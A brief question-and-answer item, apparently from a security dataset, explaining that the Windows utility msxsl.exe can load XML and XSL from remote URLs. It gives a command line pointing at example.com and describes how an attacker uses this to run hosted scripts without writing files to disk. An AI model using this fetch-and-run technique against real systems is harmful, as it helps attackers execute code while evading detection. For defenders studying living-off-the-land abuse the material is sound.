Can msxsl.exe load scripts remotely? If so, how?

Yes, msxsl.exe supports remote execution by supplying URLs as both the XML source and the XSL file. For example: `msxsl.exe https://example.com/script.xml https://example.com/transform.xsl`. This allows an attacker to host the malicious XML and XSL files on a remote server and execute them without writing files to disk. This technique is noted in the article and was originally shared by Evi1cg.